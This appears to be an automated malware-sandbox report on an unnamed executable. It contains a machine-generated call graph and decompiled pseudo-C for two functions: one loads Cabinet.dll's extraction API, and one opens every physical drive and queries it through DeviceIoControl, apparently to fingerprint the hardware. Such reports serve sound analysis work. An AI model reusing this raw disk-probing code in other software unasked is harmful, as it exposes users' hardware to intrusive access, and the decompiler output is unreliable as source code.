__calloc_impl 23073->23074 23075 d02add 23074->23075 23076 d02abe 23074->23076 23077 d10d0c __getptd 69 API calls 23075->23077 23078 d05d61 _memcpy_s 69 API calls 23076->23078 23080 d02ae2 23077->23080 23079 d02ac3 23078->23079 23081 d0653f _memcpy_s 7 API calls 23079->23081 23082 d01c4f _LocaleUpdate::_LocaleUpdate 77 API calls 23080->23082 23086 d02ad3 __calloc_impl _setlocale 23081->23086 23083 d02aec 23082->23083 23084 d0c48b __calloc_crt 69 API calls 23083->23084 23085 d02aff 23084->23085 23085->23086 23087 d0efca __lock 69 API calls 23085->23087 23088 d02b15 23087->23088 23109 d01beb 23088->23109 23095 d02b48 __setlocale_set_cat 23098 d0efca __lock 69 API calls 23095->23098 23096 d02bec 23097 d01b52 ___removelocaleref 8 API calls 23096->23097 23099 d02bf2 23097->23099 23100 d02b71 23098->23100 23101 d0197a ___freetlocinfo 69 API calls 23099->23101 23102 d01c11 _setlocale 77 API calls 23100->23102 23101->23086 23103 d02b83 23102->23103 23104 d01b52 ___removelocaleref 8 API calls 23103->23104 23105 d02b89 23104->23105 23107 d01c11 _setlocale 77 API calls 23105->23107 23108 d02ba5 _memcpy_s _sync_legacy_variables_lk 23105->23108 23107->23108 23134 d02be1 23108->23134 23110 d01bf4 23109->23110 23111 d01c0d 23109->23111 23110->23111 23112 d01ac3 ___addlocaleref 8 API calls 23110->23112 23113 d02bd5 23111->23113 23112->23111 23137 d0eed8 LeaveCriticalSection 23113->23137 23115 d02b2f 23116 d0278c 23115->23116 23117 d027b5 23116->23117 23125 d027d1 23116->23125 23118 d027bf 23117->23118 23121 d0248a __setlocale_set_cat 91 API calls 23117->23121 23124 d0071a _strlwr_s_l_stat 5 API calls 23118->23124 23119 d02908 23119->23118 23193 d020dc 23119->23193 23121->23118 23122 d02922 23138 d02259 23122->23138 23126 d029a5 23124->23126 23125->23119 23125->23122 23130 d02806 _strpbrk _strncmp _strlen _strcspn 23125->23130 23126->23095 23126->23096 23127 d02937 __setlocale_set_cat 23127->23118 23127->23119 23167 d0248a 23127->23167 23129 d132a6 __NMSG_WRITE 69 API calls 23129->23130 23130->23118 23130->23119 23130->23129 23131 d028c0 23130->23131 23133 d0248a __setlocale_set_cat 91 API calls 23130->23133 23131->23130 23132 d063d8 __invoke_watson 10 API calls 23131->23132 23132->23131 23133->23130 23372 d0eed8 LeaveCriticalSection 23134->23372 23136 d02be8 23136->23086 23137->23115 23139 d10d0c __getptd 69 API calls 23138->23139 23140 d02294 23139->23140 23143 d022e3 23140->23143 23146 d02334 __setlocale_set_cat _strlen 23140->23146 23147 d0230c 23140->23147 23141 d0071a _strlwr_s_l_stat 5 API calls 23142 d02488 23141->23142 23142->23127 23144 d1335b _strcpy_s 69 API calls 23143->23144 23145 d022f6 23144->23145 23145->23147 23148 d022ff 23145->23148 23157 d02410 _memcpy_s 23146->23157 23222 d01f46 23146->23222 23147->23141 23150 d063d8 __invoke_watson 10 API calls 23148->23150 23152 d02309 23150->23152 23152->23147 23155 d1335b _strcpy_s 69 API calls 23158 d0245d 23155->23158 23157->23155 23158->23147 23160 d02464 23158->23160 23161 d063d8 __invoke_watson 10 API calls 23160->23161 23161->23152 23162 d132a6 __NMSG_WRITE 69 API calls 23163 d023f8 23162->23163 23163->23157 23164 d023ff 23163->23164 23165 d063d8 __invoke_watson 10 API calls 23164->23165 23166 d0240b 23165->23166 23166->23157 23168 d10d0c __getptd 69 API calls 23167->23168 23169 d024a8 23168->23169 23170 d02259 __expandlocale 90 API calls 23169->23170 23173 d024d3 __setlocale_set_cat _strlen 23170->23173 23171 d0071a _strlwr_s_l_stat 5 API calls 23172 d0278a 23171->23172 23172->23127 23174 d0c446 __malloc_crt 69 API calls 23173->23174 23184 d024da 23173->23184 23175 d0251e _memcpy_s 23174->23175 23176 d1335b _strcpy_s 69 API calls 23175->23176 23175->23184 23177 d0258f 23176->23177 23178 d02596 23177->23178 23181 d025a5 _memcpy_s 23177->23181 23179 d063d8 __invoke_watson 10 API calls 23178->23179 23180 d025a2 23179->23180 23180->23181 23186 d13d69 ___crtGetStringTypeA 79 API calls 23181->23186 23191 d02686 _memcmp 23181->23191 23182 d026f9 23187 d0092b ___free_lconv_mon 69 API calls 23182->23187 23183 d0272a 23183->23184 23185 d02736 InterlockedDecrement 23183->23185 23184->23171 23185->23184 23188 d0274e 23185->23188 23186->23191 23187->23184 23189 d0092b ___free_lconv_mon 69 API calls 23188->23189 23190 d02755 23189->23190 23192 d0092b ___free_lconv_mon 69 API calls 23190->23192 23191->23182 23191->23183 23192->23184 23194 d0c446 __malloc_crt 69 API calls 23193->23194 23195 d020f5 23194->23195 23196 d01f06 __strcats 69 API calls 23195->23196 23219 d021f1 23195->23219 23200 d02130 __setlocale_set_cat 23196->23200 23197 d131e3 _strcat_s 69 API calls 23197->23200 23198 d02157 23199 d063d8 __invoke_watson 10 API calls 23198->23199 23198->23200 23199->23198 23200->23197 23200->23198 23201 d01f06 __strcats 69 API calls 23200->23201 23202 d021b8 23200->23202 23201->23200 23203 d02207 23202->23203 23204 d021be 23202->23204 23207 d0092b ___free_lconv_mon 69 API calls 23203->23207 23205 d021da 23204->23205 23206 d021cb InterlockedDecrement 23204->23206 23209 d021e2 InterlockedDecrement 23205->23209 23205->23219 23206->23205 23208 d021d2 23206->23208 23210 d0220f 23207->23210 23211 d0092b ___free_lconv_mon 69 API calls 23208->23211 23212 d021e9 23209->23212 23209->23219 23213 d0222e 23210->23213 23214 d0221f InterlockedDecrement 23210->23214 23211->23205 23216 d0092b ___free_lconv_mon 69 API calls 23212->23216 23215 d02236 InterlockedDecrement 23213->23215 23213->23219 23214->23213 23217 d02226 23214->23217 23218 d0223d 23215->23218 23215->23219 23216->23219 23220 d0092b ___free_lconv_mon 69 API calls 23217->23220 23221 d0092b ___free_lconv_mon 69 API calls 23218->23221 23219->23118 23220->23213 23221->23219 23224 d01f5f _memset 23222->23224 23223 d01f6b 23223->23147 23235 d139be 23223->23235 23224->23223 23225 d01faa _strcspn 23224->23225 23226 d01f7d 23224->23226 23225->23223 23232 d132a6 __NMSG_WRITE 69 API calls 23225->23232 23233 d0202c 23225->23233 23227 d132a6 __NMSG_WRITE 69 API calls 23226->23227 23228 d01f8e 23227->23228 23228->23223 23229 d01f95 23228->23229 23230 d063d8 __invoke_watson 10 API calls 23229->23230 23231 d01f9f 23230->23231 23231->23223 23232->23225 23233->23225 23234 d063d8 __invoke_watson 10 API calls 23233->23234 23234->23233 23236 d10d0c __getptd 69 API calls 23235->23236 23240 d139cb 23236->23240 23237 d139da GetUserDefaultLCID 23266 d13a5d 23237->23266 23239 d13a06 23241 d13a66 23239->23241 23244 d13a18 23239->23244 23240->23237 23240->23239 23283 d133c3 23240->23283 23241->23237 23247 d13a71 _strlen 23241->23247 23242 d023a2 23242->23147 23274 d0206f 23242->23274 23246 d13a2a 23244->23246 23249 d13a23 23244->23249 23291 d13982 23246->23291 23253 d13a77 EnumSystemLocalesA 23247->23253 23287 d1391b 23249->23287 23252 d13a28 23254 d133c3 _TranslateName 79 API calls 23252->23254 23252->23266 23253->23266 23256 d13a46 23254->23256 23255 d13af0 IsValidCodePage 23255->23242 23257 d13b02 IsValidLocale 23255->23257 23259 d13a5f 23256->23259 23260 d13a58 23256->23260 23256->23266 23257->23242 23258 d13b15 23257->23258 23258->23242 23263 d13b46 23258->23263 23264 d13b6b GetLocaleInfoA 23258->23264 23261 d13982 _GetLcidFromLanguage EnumSystemLocalesA 23259->23261 23262 d1391b _GetLcidFromLangCountry EnumSystemLocalesA 23260->23262 23261->23266 23262->23266 23267 d1335b _strcpy_s 69 API calls 23263->23267 23264->23242 23265 d13b7c GetLocaleInfoA 23264->23265 23265->23242 23269 d13b90 23265->23269 23266->23242 23295 d13439 23266->23295 23268 d13b53 23267->23268 23268->23265 23270 d13b5a 23268->23270 23307 d287c1 23269->23307 23272 d063d8 __invoke_watson 10 API calls 23270->23272 23273 d13b66 23272->23273 23273->23265 23275 d1335b _strcpy_s 69 API calls 23274->23275 23276 d02085 23275->23276 23277 d063d8 __invoke_watson 10 API calls 23276->23277 23278 d02098 23276->23278 23277->23278 23279 d020b5 23278->23279 23367 d01f06 23278->23367 23281 d020d7 23279->23281 23282 d01f06 __strcats 69 API calls 23279->23282 23281->23162 23282->23281 23284 d13417 23283->23284 23286 d133d3 23283->23286 23284->23239 23286->23284 23311 d28542 23286->23311 23288 d13922 _GetPrimaryLen _strlen 23287->23288 23289 d13958 EnumSystemLocalesA 23288->23289 23290 d13972 23289->23290 23290->23252 23293 d13989 _GetPrimaryLen _strlen 23291->23293 23292 d139a3 EnumSystemLocalesA 23294 d139b9 23292->23294 23293->23292 23294->23252 23296 d13452 __setlocale_set_cat 23295->23296 23297 d134a5 GetLocaleInfoA 23295->23297 23296->23297 23304 d13468 __setlocale_set_cat 23296->23304 23298 d134c1 __setlocale_set_cat 23297->23298 23299 d13497 23297->23299 23302 d134d5 GetACP 23298->23302 23303 d1348e 23298->23303 23300 d0071a _strlwr_s_l_stat 5 API calls 23299->23300 23301 d134a3 23300->23301 23301->23242 23301->23255 23302->23299 23335 d0b84f 23303->23335 23304->23303 23306 d13479 GetLocaleInfoA 23304->23306 23306->23299 23306->23303 23308 d287cf 23307->23308 23354 d286e4 23308->23354 23312 d2857b 23311->23312 23313 d28552 23311->23313 23320 d2846d 23312->23320 23313->23312 23314 d28557 23313->23314 23316 d05d61 _memcpy_s 69 API calls 23314->23316 23318 d2855c 23316->23318 23317 d2856c 23317->23286 23319 d0653f _memcpy_s 7 API calls 23318->23319 23319->23317 23321 d00c48 _LocaleUpdate::_LocaleUpdate 79 API calls 23320->23321 23322 d28481 23321->23322 23323 d284b6 23322->23323 23324 d28488 23322->23324 23326 d284be 23323->23326 23334 d284e9 23323->23334 23325 d05d61 _memcpy_s 69 API calls 23324->23325 23327 d2848d 23325->23327 23328 d05d61 _memcpy_s 69 API calls 23326->23328 23329 d0653f _memcpy_s 7 API calls 23327->23329 23330 d284c3 23328->23330 23332 d2849d ___ascii_stricmp 23329->23332 23331 d0653f _memcpy_s 7 API calls 23330->23331 23331->23332 23332->23317 23333 d0de42 79 API calls __tolower_l 23333->23334 23334->23332 23334->23333 23338 d2172a 23335->23338 23339 d21743 23338->23339 23342 d214fb 23339->23342 23343 d00c48 _LocaleUpdate::_LocaleUpdate 79 API calls 23342->23343 23345 d21510 23343->23345 23344 d21522 23346 d05d61 _memcpy_s 69 API calls 23344->23346 23345->23344 23350 d2155f 23345->23350 23347 d21527 23346->23347 23348 d0653f _memcpy_s 7 API calls 23347->23348 23353 d0b860 23348->23353 23349 d2052d __isctype_l 79 API calls 23349->23350 23350->23349 23351 d215a4 23350->23351 23352 d05d61 _memcpy_s 69 API calls 23351->23352 23351->23353 23352->23353 23353->23299 23355 d28712 23354->23355 23356 d286f4 23354->23356 23358 d28718 23355->23358 23364 d28746 23355->23364 23357 d05d61 _memcpy_s 69 API calls 23356->23357 23359 d286f9 23357->23359 23360 d05d61 _memcpy_s 69 API calls 23358->23360 23361 d05d61 _memcpy_s 69 API calls 23364->23361 23366 d28708 23364->23366 23366->23242 23368 d01f16 23367->23368 23371 d01f41 23367->23371 23369 d131e3 _strcat_s 69 API calls 23368->23369 23370 d063d8 __invoke_watson 10 API calls 23368->23370 23368->23371 23369->23368 23370->23368 23371->23279 23372->23136 23373 c89990 GetCurrentProcessId 23398 c895f0 23373->23398 23376 c89acf 23378 d0071a _strlwr_s_l_stat 5 API calls 23376->23378 23377 c89a1f GetLastError 23379 c89a2c WaitForSingleObject 23377->23379 23380 c89a35 23377->23380 23381 c89aef 23378->23381 23379->23380 23402 c89740 GetProcessHeap 23380->23402 23383 c89a41 23384 c89a4c 23383->23384 23385 c89a45 23383->23385 23409 c89fa0 GetProcessHeap 23384->23409 23386 c89ab0 ReleaseMutex 23385->23386 23386->23376 23388 c89ac8 CloseHandle 23386->23388 23388->23376 23389 c89a51 23391 c89a62 23389->23391 23412 c89de0 23389->23412 23392 c89a84 23391->23392 23393 d00729 __CxxThrowException@8 RaiseException 23391->23393 23418 c89830 GetProcessHeap 23392->23418 23393->23392 23396 c89aab 23396->23386 23397 d00729 __CxxThrowException@8 RaiseException 23397->23396 23399 c895f6 23398->23399 23400 d03d9f _vswprintf_s 79 API calls 23399->23400 23401 c8961f CreateMutexW 23399->23401 23400->23401 23401->23376 23401->23377 23403 c89778 23402->23403 23404 c8978d HeapLock HeapWalk 23402->23404 23403->23383 23405 c897fe HeapUnlock 23404->23405 23406 c897b2 23404->23406 23405->23383 23407 c897e9 HeapWalk 23406->23407 23408 c897f5 23406->23408 23407->23406 23407->23408 23408->23405 23410 c89fbc 23409->23410 23411 c89fad HeapAlloc 23409->23411 23410->23389 23411->23389 23413 d006a0 _memset 23412->23413 23414 c89e2c TlsAlloc 23413->23414 23415 c89e78 23414->23415 23416 c89e61 23414->23416 23415->23391 23417 d00729 __CxxThrowException@8 RaiseException 23416->23417 23417->23415 23419 c8983a 23418->23419 23420 c8983d HeapAlloc 23418->23420 23419->23396 23419->23397 23420->23419 23421 ca51b6 GetCurrentThreadId 23422 ca51e4 23421->23422 23427 ca51ca 23421->23427 23423 ca5208 23422->23423 23424 ca51ee TlsGetValue 23422->23424 23429 ca1a15 23423->23429 23424->23423 23424->23427 23426 ca5210 23426->23427 23428 ca524e LoadLibraryW GetProcAddress GetProcAddress GetProcAddress GetProcAddress 23426->23428 23428->23427 23430 ca1a1f 23429->23430 23431 ca1a22 23429->23431 23430->23426 23432 ca1a38 TlsGetValue 23431->23432 23433 ca1a29 TlsSetValue 23431->23433 23432->23426 23433->23430 23433->23432 23434 ca2174 23437 c9ded5 23434->23437 23436 ca2188 23439 c9dee3 std::_String_base::_Xlen 23437->23439 23442 c9df26 ctype _wcsncpy 23437->23442 23438 c9df1a 23438->23442 23443 c9dea9 23438->23443 23439->23438 23440 d00729 __CxxThrowException@8 RaiseException 23439->23440 23440->23438 23442->23436 23444 c9deb7 _wcslen 23443->23444 23445 c9ded3 23444->23445 23446 d00729 __CxxThrowException@8 RaiseException 23444->23446 23445->23442 23446->23445 23447 c9bb36 23448 c9bb42 __EH_prolog3 23447->23448 23449 c9bb6d std::_String_base::_Xlen 23448->23449 23453 cf134e 23448->23453 23451 c9bb63 23452 d010c4 std::_String_base::_Xlen 76 API calls 23451->23452 23452->23449 23454 cf135a __EH_prolog3 23453->23454 23461 cac024 23454->23461 23456 cf137b 23465 ceafbf InitializeCriticalSection 23456->23465 23458 cf1383 23459 c9acf3 76 API calls 23458->23459 23460 cf1393 std::_String_base::_Xlen 23459->23460 23460->23451 23462 cac030 __EH_prolog3 23461->23462 23466 caaf1a 23462->23466 23464 cac03e std::_String_base::_Xlen 23464->23456 23465->23458 23467 caacc0 77 API calls 23466->23467 23468 caaf2d 23467->23468 23468->23464

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00CA51B6 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98libraryloaderthreadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 352 ca51b6-ca51c8 GetCurrentThreadId 353 ca51ca-ca51d0 352->353 354 ca51e4-ca51ec 352->354 355 ca51d7 353->355 356 ca5208-ca5214 call ca1a15 354->356 357 ca51ee-ca51f7 TlsGetValue 354->357 358 ca51da-ca51df 355->358 363 ca5228-ca523c call c9e72b 356->363 364 ca5216-ca5226 356->364 357->356 359 ca51f9-ca5206 357->359 361 ca5320-ca5322 358->361 359->355 367 ca52dd-ca52df 363->367 368 ca5242-ca5248 363->368 364->358 371 ca531f 367->371 369 ca524e-ca52b4 LoadLibraryW GetProcAddress * 4 368->369 370 ca52e1-ca531d 368->370 372 ca52ca-ca52da 369->372 373 ca52b6-ca52bc 369->373 370->371 371->361 372->367 373->372 374 ca52be-ca52c4 373->374 374->372 376 ca52c6-ca52c8 374->376 376->370 376->372
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00CA51B6(void* __ecx) {
				long _t34;
				signed int _t37;
				intOrPtr _t38;
				struct HINSTANCE__* _t39;
				_Unknown_base(*)()* _t43;
				void* _t44;
				void* _t48;
				void* _t59;

				_t59 = __ecx;
				if( *((intOrPtr*)(_t59 + 0x1108)) == GetCurrentThreadId()) {
					_t34 =  *0xd668f0; // 0x22
					if(_t34 == 0xffffffff || TlsGetValue(_t34) == 0) {
						if(E00CA1A15(1, _t59) != 0) {
							_t11 = _t59 + 0x10cc; // 0x10d4
							_t48 = _t11;
							E00C9E72B(_t48);
							if( *((intOrPtr*)(_t59 + 0x10f0)) != 0) {
								L16:
								_t37 = 0;
								L18:
								return _t37;
							}
							if( *(_t59 + 0x110c) != 0) {
								L17:
								_t38 =  *((intOrPtr*)(_t59 + 0x1110))(0xca1a45, 0xca1a4a, 0xca4fc4, 0xca409d, 0xca2d44, E00CA40C6, 0xca40e7, 1, _t48);
								 *((intOrPtr*)(_t59 + 0x10f0)) = _t38;
								_t37 = 0 | _t38 != 0x00000000;
								goto L18;
							}
							_t39 = LoadLibraryW(L"Cabinet.dll"); // executed
							 *(_t59 + 0x110c) = _t39;
							 *((intOrPtr*)(_t59 + 0x1110)) = GetProcAddress(_t39, "FDICreate");
							 *((intOrPtr*)(_t59 + 0x1114)) = GetProcAddress( *(_t59 + 0x110c), "FDICopy");
							 *((intOrPtr*)(_t59 + 0x1118)) = GetProcAddress( *(_t59 + 0x110c), "FDIIsCabinet");
							_t43 = GetProcAddress( *(_t59 + 0x110c), "FDIDestroy");
							 *(_t59 + 0x111c) = _t43;
							if( *((intOrPtr*)(_t59 + 0x1110)) == 0 ||  *((intOrPtr*)(_t59 + 0x1114)) == 0 ||  *((intOrPtr*)(_t59 + 0x1118)) == 0 || _t43 == 0) {
								 *(_t59 + 0x110c) = 0;
								 *((intOrPtr*)(_t48 + 0x18)) = 0x3e8;
								 *((intOrPtr*)(_t48 + 0x1c)) = 0;
								 *((intOrPtr*)(_t48 + 0x20)) = 0;
								goto L16;
							} else {
								goto L17;
							}
						}
						_t8 = _t59 + 0x10cc; // 0x10d4
						_t44 = _t8;
						 *((intOrPtr*)(_t44 + 0x18)) = 0;
						 *((intOrPtr*)(_t44 + 0x1c)) = 0xe;
						goto L3;
					} else {
						_t6 = _t59 + 0x10cc; // 0x10d4
						_t44 = _t6;
						 *((intOrPtr*)(_t44 + 0x18)) = 0x3f4;
						L2:
						 *((intOrPtr*)(_t44 + 0x1c)) = 0;
						L3:
						 *((intOrPtr*)(_t44 + 0x20)) = 0;
						return 0;
					}
				}
				_t2 = _t59 + 0x10cc; // 0x10d4
				_t44 = _t2;
				 *((intOrPtr*)(_t44 + 0x18)) = 0x3f3;
				goto L2;
			}











                                                                                                                                                                                          0x00ca51b8
                                                                                                                                                                                          0x00ca51c8
                                                                                                                                                                                          0x00ca51e4
                                                                                                                                                                                          0x00ca51ec
                                                                                                                                                                                          0x00ca5214
                                                                                                                                                                                          0x00ca5229
                                                                                                                                                                                          0x00ca5229
                                                                                                                                                                                          0x00ca5231
                                                                                                                                                                                          0x00ca523c
                                                                                                                                                                                          0x00ca52dd
                                                                                                                                                                                          0x00ca52dd
                                                                                                                                                                                          0x00ca531f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca531f
                                                                                                                                                                                          0x00ca5248
                                                                                                                                                                                          0x00ca52e1
                                                                                                                                                                                          0x00ca5307
                                                                                                                                                                                          0x00ca5317
                                                                                                                                                                                          0x00ca531d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca531d
                                                                                                                                                                                          0x00ca5254
                                                                                                                                                                                          0x00ca5266
                                                                                                                                                                                          0x00ca5279
                                                                                                                                                                                          0x00ca528c
                                                                                                                                                                                          0x00ca529f
                                                                                                                                                                                          0x00ca52a5
                                                                                                                                                                                          0x00ca52a7
                                                                                                                                                                                          0x00ca52b4
                                                                                                                                                                                          0x00ca52ca
                                                                                                                                                                                          0x00ca52d0
                                                                                                                                                                                          0x00ca52d7
                                                                                                                                                                                          0x00ca52da
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca52b4
                                                                                                                                                                                          0x00ca5216
                                                                                                                                                                                          0x00ca5216
                                                                                                                                                                                          0x00ca521c
                                                                                                                                                                                          0x00ca521f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca51f9
                                                                                                                                                                                          0x00ca51f9
                                                                                                                                                                                          0x00ca51f9
                                                                                                                                                                                          0x00ca51ff
                                                                                                                                                                                          0x00ca51d7
                                                                                                                                                                                          0x00ca51d7
                                                                                                                                                                                          0x00ca51da
                                                                                                                                                                                          0x00ca51da
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca51dd
                                                                                                                                                                                          0x00ca51ec
                                                                                                                                                                                          0x00ca51ca
                                                                                                                                                                                          0x00ca51ca
                                                                                                                                                                                          0x00ca51d0
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CA51BA
                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000022), ref: 00CA51EF
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Cabinet.dll,?), ref: 00CA5254
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FDICreate), ref: 00CA526C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,FDICopy), ref: 00CA527F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,FDIIsCabinet), ref: 00CA5292
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,FDIDestroy), ref: 00CA52A5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$CurrentLibraryLoadThreadValue
                                                                                                                                                                                          • String ID: Cabinet.dll$FDICopy$FDICreate$FDIDestroy$FDIIsCabinet
                                                                                                                                                                                          • API String ID: 3141885424-2042144077
                                                                                                                                                                                          • Opcode ID: 5b52cef234360339a017244050a4810edb6eacfc0a157ee65f5773c7ac87f4e8
                                                                                                                                                                                          • Instruction ID: f55fb27e05883eedf6b61ecb4e1c0f9f7e11c61a6d7e9759c6a865fef5a965f6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b52cef234360339a017244050a4810edb6eacfc0a157ee65f5773c7ac87f4e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: B931C574940B06EFC7349F71D845AD7BBE4EB16308F108A2EE66A82290D7B0A584CF90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFE360 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 144fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 568 cfe360-cfe381 569 cfe387-cfe38f 568->569 570 cfe556-cfe56c call d0071a 568->570 569->570 572 cfe395-cfe3a8 569->572 574 cfe3b0-cfe3e9 call c926b0 CreateFileA 572->574 577 cfe3ef-cfe430 DeviceIoControl 574->577 578 cfe530-cfe534 574->578 580 cfe43e-cfe444 577->580 581 cfe432-cfe439 CloseHandle 577->581 578->574 579 cfe53a-cfe555 call d0071a 578->579 583 cfe44a-cfe4d0 call d006a0 call d00610 580->583 584 cfe522-cfe52e CloseHandle 580->584 581->578 583->584 590 cfe4d2-cfe4db 583->590 584->578 584->579 591 cfe4e0-cfe4f0 590->591 591->591 592 cfe4f2-cfe518 call d005a0 call c927a0 591->592 592->584 597 cfe51a 592->597 597->584
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00CFE360(void* __edi, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				char _v260;
				char _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				char _v296;
				char _v1320;
				struct _OVERLAPPED* _v1324;
				struct _OVERLAPPED* _v1328;
				struct _OVERLAPPED* _v1332;
				struct _OVERLAPPED* _v1336;
				struct _OVERLAPPED* _v1340;
				unsigned char _v1341;
				void _v1344;
				char _v1348;
				intOrPtr _v1352;
				long _v1356;
				void* _v1360;
				void* __ebx;
				void* __esi;
				signed int _t40;
				intOrPtr _t42;
				void* _t47;
				int _t52;
				unsigned char _t53;
				void* _t63;
				signed short* _t64;
				void* _t66;
				void* _t69;
				signed char _t70;
				void* _t71;
				signed int* _t79;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				signed int _t90;

				_t83 = __edi;
				_t90 =  &_v1360;
				_t40 =  *0xd64070; // 0x8a9e1774
				_v4 = _t40 ^ _t90;
				_t42 = _a4;
				_v1352 = _t42;
				if(_t42 == 0 || _a8 == 0) {
					return E00D0071A(0, _t69, _v4 ^ _t90, _t81, _t83, _t84);
				} else {
					_push(_t69);
					_push(_t84);
					_v1360 = 0;
					_t70 = 0;
					do {
						E00C926B0( &_v260, 0x100, "\\\\.\\PhysicalDrive%d", _t70);
						_t90 = _t90 + 0x10;
						_t47 = CreateFileA( &_v260, 0xc0000000, 3, 0, 3, 0, 0); // executed
						_t85 = _t47;
						if(_t85 == 0xffffffff) {
							goto L13;
						} else {
							_t81 =  &_v1356;
							_v1344 = 0;
							_v1340 = 0;
							_v1336 = 0;
							_v1332 = 0;
							_v1328 = 0;
							_v1324 = 0;
							_v1356 = 0;
							_t52 = DeviceIoControl(_t85, 0x74080, 0, 0,  &_v1344, 0x18,  &_v1356, 0); // executed
							if(_t52 != 0) {
								_t53 = _v1341;
								if(_t53 > 0) {
									asm("sbb al, al");
									_v1348 = ( ~(_t53 >> _t70 & 0x00000010) & 0x000000b5) + 0xec;
									_v296 = 0;
									_v292 = 0;
									_v288 = 0;
									_v284 = 0;
									_v280 = 0;
									_v276 = 0;
									_v272 = 0;
									_v268 = 0;
									_v264 = 0;
									E00D006A0(_t83, 0xd679e0, 0, 0x210);
									_t81 = _v1348;
									_t63 = E00D00610(_t85,  &_v296, 0xd679e0, _v1348, _t70,  &_v1356);
									_t90 = _t90 + 0x24;
									if(_t63 != 0) {
										_t79 =  &_v1320;
										_t64 = 0xd679f0;
										do {
											 *_t79 =  *_t64 & 0x0000ffff;
											_t64 =  &(_t64[1]);
											_t79 =  &(_t79[1]);
										} while (_t64 < 0xd67bf0);
										_t66 = E00D005A0( &_v1320, 0xa, 0x13);
										_t81 = _v1352;
										_t90 = _t90 + 0xc;
										if(E00C927A0(_v1352, _a8, _t66) == 0) {
											_v1360 = 1;
										}
									}
								}
								CloseHandle(_t85);
								if(_v1360 == 0) {
									goto L13;
								}
							} else {
								CloseHandle(_t85);
								goto L13;
							}
						}
						break;
						L13:
						_t70 = _t70 + 1;
					} while (_t70 < 0x10);
					_pop(_t86);
					_pop(_t71);
					return E00D0071A(_v1360, _t71, _v4 ^ _t90, _t81, _t83, _t86);
				}
			}













































                                                                                                                                                                                          0x00cfe360
                                                                                                                                                                                          0x00cfe360
                                                                                                                                                                                          0x00cfe366
                                                                                                                                                                                          0x00cfe36d
                                                                                                                                                                                          0x00cfe374
                                                                                                                                                                                          0x00cfe37b
                                                                                                                                                                                          0x00cfe381
                                                                                                                                                                                          0x00cfe56c
                                                                                                                                                                                          0x00cfe395
                                                                                                                                                                                          0x00cfe395
                                                                                                                                                                                          0x00cfe39d
                                                                                                                                                                                          0x00cfe39e
                                                                                                                                                                                          0x00cfe3a6
                                                                                                                                                                                          0x00cfe3b0
                                                                                                                                                                                          0x00cfe3c3
                                                                                                                                                                                          0x00cfe3c8
                                                                                                                                                                                          0x00cfe3e2
                                                                                                                                                                                          0x00cfe3e4
                                                                                                                                                                                          0x00cfe3e9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe3ef
                                                                                                                                                                                          0x00cfe3f2
                                                                                                                                                                                          0x00cfe3f9
